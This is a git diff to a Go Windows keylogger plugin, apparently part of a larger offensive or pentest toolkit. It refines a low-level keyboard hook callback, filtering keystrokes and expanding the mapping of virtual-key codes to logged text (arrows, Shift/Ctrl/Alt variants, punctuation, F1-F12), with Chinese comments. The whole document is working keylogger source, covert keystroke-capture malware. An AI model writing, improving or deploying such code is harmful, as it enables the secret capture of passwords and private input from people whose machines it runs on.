diff --git a/Plugins/local/keylogger/keylogger_windows.go b/Plugins/local/keylogger/keylogger_windows.go index 6ec214c..087d38d 100644 --- a/Plugins/local/keylogger/keylogger_windows.go +++ b/Plugins/local/keylogger/keylogger_windows.go @@ -28,7 +28,9 @@ var ( const ( WH_KEYBOARD_LL = 13 WM_KEYDOWN = 0x0100 + WM_KEYUP = 0x0101 WM_SYSKEYDOWN = 0x0104 + WM_SYSKEYUP = 0x0105 ) type ( @@ -162,7 +164,7 @@ func (p *KeyloggerPlugin) startKeyboardHook() { } } -// keyboardHookProc Hook回调函数 - 最高效版本 +// keyboardHookProc Hook回调函数 - 简化版本 func keyboardHookProc(nCode int, wParam WPARAM, lParam LPARAM) LRESULT { // 立即调用下一个Hook,确保系统响应 ret, _, _ := procCallNextHookEx.Call( @@ -176,17 +178,22 @@ func keyboardHookProc(nCode int, wParam WPARAM, lParam LPARAM) LRESULT { if nCode >= 0 && eventChannel != nil { if wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN { kbdStruct := (*KBDLLHOOKSTRUCT)(unsafe.Pointer(lParam)) + vkCode := kbdStruct.VkCode - // 非阻塞发送事件 - select { - case eventChannel <- KeyboardEvent{ - Kind: KeyDown, - Rawcode: uint16(kbdStruct.VkCode), - Keychar: quickKeyChar(kbdStruct.VkCode), - Timestamp: time.Now(), - }: - default: - // 通道满了就跳过,不阻塞系统 + + keychar := quickKeyChar(vkCode) + if keychar != "" { + // 非阻塞发送事件 + select { + case eventChannel <- KeyboardEvent{ + Kind: KeyDown, + Rawcode: uint16(vkCode), + Keychar: keychar, + Timestamp: time.Now(), + }: + default: + // 通道满了就跳过,不阻塞系统 + } } } } @@ -240,13 +247,18 @@ func (p *KeyloggerPlugin) writeLogHeader() { logFile.Sync() } -// quickKeyChar 快速键码转字符(高度优化版本) +// quickKeyChar 快速键码转字符(简化版本) func quickKeyChar(vkCode DWORD) string { switch { - case vkCode >= 0x30 && vkCode <= 0x39: // 数字0-9 + // 数字0-9 + case vkCode >= 0x30 && vkCode <= 0x39: return string(rune(vkCode)) - case vkCode >= 0x41 && vkCode <= 0x5A: // 字母A-Z - return string(rune(vkCode + 32)) // 转小写 + + // 字母A-Z (统一转小写) + case vkCode >= 0x41 && vkCode <= 0x5A: + return string(rune(vkCode + 32)) + + // 基本特殊字符 case vkCode == 0x20: return " " case vkCode == 0x0D: @@ -255,14 +267,47 @@ func quickKeyChar(vkCode DWORD) string { return "[Backspace]" case vkCode == 0x09: return "[Tab]" - case vkCode == 0x10: - return "[Shift]" - case vkCode == 0x11: - return "[Ctrl]" - case vkCode == 0x12: - return "[Alt]" case vkCode == 0x1B: return "[Esc]" + case vkCode == 0x2E: + return "[Delete]" + + // 方向键 + case vkCode == 0x25: + return "[Left]" + case vkCode == 0x26: + return "[Up]" + case vkCode == 0x27: + return "[Right]" + case vkCode == 0x28: + return "[Down]" + + // 特殊键 (包括左右Shift/Ctrl/Alt) + case vkCode == 0x10 || vkCode == 0xA0 || vkCode == 0xA1: // VK_SHIFT, VK_LSHIFT, VK_RSHIFT + return "[Shift]" + case vkCode == 0x11 || vkCode == 0xA2 || vkCode == 0xA3: // VK_CONTROL, VK_LCONTROL, VK_RCONTROL + return "[Ctrl]" + case vkCode == 0x12 || vkCode == 0xA4 || vkCode == 0xA5: // VK_MENU, VK_LMENU, VK_RMENU + return "[Alt]" + + // 基本标点符号 + case vkCode == 0xBA: // ; + return ";" + case vkCode == 0xBB: // = + return "=" + case vkCode == 0xBC: // , + return "," + case vkCode == 0xBD: // - + return "-" + case vkCode == 0xBE: // . + return "." + case vkCode == 0xBF: // / + return "/" + + // 功能键 + case vkCode >= 0x70 && vkCode <= 0x7B: // F1-F12 + return fmt.Sprintf("[F%d]", vkCode-0x6F) + default: return "" // 跳过其他按键,保持高性能 }